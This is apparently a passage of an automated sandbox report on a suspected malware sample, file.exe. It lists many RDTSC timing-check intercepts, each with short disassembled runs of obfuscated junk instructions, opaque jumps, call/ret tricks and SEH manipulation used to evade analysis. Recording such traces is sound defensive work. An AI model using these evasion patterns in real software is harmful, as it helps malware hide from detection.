                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122CBD2 second address: 122CBD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122CBD6 second address: 122CBDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122CBDC second address: 122CBF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007EFEB91CA54Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122CE1E second address: 122CE24 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122CE24 second address: 122CE50 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFEB91CA54Ch 0x00000008 je 00007EFEB91CA546h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov di, FC5Fh 0x00000017 sub edi, 34C93FDFh 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jnc 00007EFEB91CA54Ch 0x00000026 jc 00007EFEB91CA546h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122CE50 second address: 122CE56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122CE56 second address: 122CE6E instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFEB91CA546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jnl 00007EFEB91CA546h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122CE6E second address: 122CE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122D33C second address: 122D346 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFEB91CA54Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122D346 second address: 122D371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007EFEB92DE1F6h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 pushad 0x00000011 push edi 0x00000012 pop ebx 0x00000013 popad 0x00000014 push eax 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122D371 second address: 122D375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122DAD4 second address: 122DAF4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007EFEB92DE1F8h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122DAF4 second address: 122DB00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123034A second address: 123037D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007EFEB92DE1E8h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 sub dword ptr [ebp+122D1BEFh], eax 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+122D2F05h], edi 0x0000001f push 00000000h 0x00000021 mov edi, dword ptr [ebp+122D2856h] 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jnc 00007EFEB92DE1E6h 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123037D second address: 1230382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1231960 second address: 12319AD instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFEB92DE1E8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, 75F40253h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007EFEB92DE1E8h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e mov esi, dword ptr [ebp+122D1A6Bh] 0x00000034 push 00000000h 0x00000036 mov edi, dword ptr [ebp+122D1F82h] 0x0000003c push eax 0x0000003d pushad 0x0000003e jo 00007EFEB92DE1ECh 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1232482 second address: 1232486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1232486 second address: 123248C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123248C second address: 1232491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1233E34 second address: 1233E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007EFEB92DE1ECh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007EFEB92DE1EDh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1234360 second address: 1234385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFEB91CA54Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1234385 second address: 1234416 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007EFEB92DE1ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007EFEB92DE1ECh 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007EFEB92DE1E8h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c js 00007EFEB92DE1E7h 0x00000032 cld 0x00000033 jmp 00007EFEB92DE1F0h 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push eax 0x0000003d call 00007EFEB92DE1E8h 0x00000042 pop eax 0x00000043 mov dword ptr [esp+04h], eax 0x00000047 add dword ptr [esp+04h], 00000017h 0x0000004f inc eax 0x00000050 push eax 0x00000051 ret 0x00000052 pop eax 0x00000053 ret 0x00000054 jmp 00007EFEB92DE1EAh 0x00000059 push eax 0x0000005a push ecx 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007EFEB92DE1EBh 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1235489 second address: 123548E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123548E second address: 1235494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1235494 second address: 12354B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a jmp 00007EFEB91CA54Fh 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007EFEB91CA546h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12354B6 second address: 123552D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007EFEB92DE1E8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebp 0x0000002c call 00007EFEB92DE1E8h 0x00000031 pop ebp 0x00000032 mov dword ptr [esp+04h], ebp 0x00000036 add dword ptr [esp+04h], 0000001Ah 0x0000003e inc ebp 0x0000003f push ebp 0x00000040 ret 0x00000041 pop ebp 0x00000042 ret 0x00000043 jnl 00007EFEB92DE1ECh 0x00000049 push eax 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123552D second address: 1235531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123B623 second address: 123B628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123B628 second address: 123B634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123B634 second address: 123B63D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123B63D second address: 123B641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123B641 second address: 123B6B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007EFEB92DE1E8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov ebx, esi 0x00000027 sub ebx, dword ptr [ebp+122D2AFAh] 0x0000002d push 00000000h 0x0000002f add bx, A112h 0x00000034 push 00000000h 0x00000036 jno 00007EFEB92DE1FAh 0x0000003c jmp 00007EFEB92DE1F4h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jc 00007EFEB92DE1ECh 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123B6B0 second address: 123B6C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFEB91CA553h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12316FF second address: 1231704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1231704 second address: 1231715 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123E7E1 second address: 123E829 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007EFEB92DE1ECh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, 2FAD4808h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007EFEB92DE1E8h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f add bh, FFFFFFBFh 0x00000032 push 00000000h 0x00000034 mov edi, esi 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push ecx 0x0000003a pushad 0x0000003b popad 0x0000003c pop ecx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12417A6 second address: 12417C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA54Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007EFEB91CA550h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12346A2 second address: 12346A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12346A6 second address: 12346AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12346AC second address: 12346B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12356D7 second address: 12356DD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1236682 second address: 1236687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1236687 second address: 1236697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFEB91CA54Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123789E second address: 12378A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007EFEB92DE1E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1238852 second address: 1238856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1238856 second address: 123885C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123885C second address: 1238860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1238944 second address: 1238960 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007EFEB92DE1ECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12464B0 second address: 12464BC instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFEB91CA54Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123B838 second address: 123B852 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123B852 second address: 123B8F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA54Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007EFEB91CA548h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov edi, dword ptr [ebp+122D2A02h] 0x0000002c add dword ptr [ebp+1244E651h], ecx 0x00000032 push dword ptr fs:[00000000h] 0x00000039 jmp 00007EFEB91CA558h 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 call 00007EFEB91CA550h 0x0000004a or di, 6AF0h 0x0000004f pop ebx 0x00000050 mov edi, dword ptr [ebp+122D2CE1h] 0x00000056 mov eax, dword ptr [ebp+122D0505h] 0x0000005c or ebx, dword ptr [ebp+122D35CEh] 0x00000062 push FFFFFFFFh 0x00000064 mov ebx, 3729923Dh 0x00000069 push eax 0x0000006a push ebx 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007EFEB91CA54Bh 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123C915 second address: 123C919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123E989 second address: 123E98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123E98E second address: 123EA21 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add dword ptr [ebp+1244BD32h], ebx 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007EFEB92DE1E8h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 movzx ebx, dx 0x00000033 mov di, si 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d push 00000000h 0x0000003f push eax 0x00000040 call 00007EFEB92DE1E8h 0x00000045 pop eax 0x00000046 mov dword ptr [esp+04h], eax 0x0000004a add dword ptr [esp+04h], 0000001Dh 0x00000052 inc eax 0x00000053 push eax 0x00000054 ret 0x00000055 pop eax 0x00000056 ret 0x00000057 mov eax, dword ptr [ebp+122D1791h] 0x0000005d jno 00007EFEB92DE1E8h 0x00000063 mov ebx, dword ptr [ebp+122D27B6h] 0x00000069 push FFFFFFFFh 0x0000006b jmp 00007EFEB92DE1EEh 0x00000070 nop 0x00000071 pushad 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123EA21 second address: 123EA52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007EFEB91CA546h 0x0000000a popad 0x0000000b push edx 0x0000000c jmp 00007EFEB91CA554h 0x00000011 pop edx 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007EFEB91CA54Ch 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1240900 second address: 1240906 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124098C second address: 1240990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1243A11 second address: 1243A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F2309 second address: 11F230F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F230F second address: 11F232C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007EFEB92DE1E6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F232C second address: 11F2330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124EEA7 second address: 124EEC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFEB92DE1EAh 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124EEC2 second address: 124EEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007EFEB91CA551h 0x0000000f push edi 0x00000010 pop edi 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 pushad 0x00000015 jne 00007EFEB91CA546h 0x0000001b js 00007EFEB91CA546h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124EEF2 second address: 124EF15 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFEB92DE1E8h 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b jmp 00007EFEB92DE1F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124F078 second address: 124F08D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFEB91CA551h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1252A28 second address: 1252A57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFEB92DE1F8h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1252A57 second address: 1252A5D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1252A5D second address: 1252A63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1252A63 second address: 1252A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007EFEB91CA546h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1252A6D second address: 1252A71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12550C2 second address: 12550C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125516C second address: 1255170 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125522D second address: 1255233 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125B6CD second address: 125B6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125BC31 second address: 125BC3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007EFEB91CA546h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125BC3F second address: 125BC45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125BC45 second address: 125BC49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125BDD8 second address: 125BDF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007EFEB92DE1F1h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125BDF1 second address: 125BE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007EFEB91CA54Ch 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125C359 second address: 125C366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007EFEB92DE1E6h 0x0000000c popad 0x0000000d rdtsc
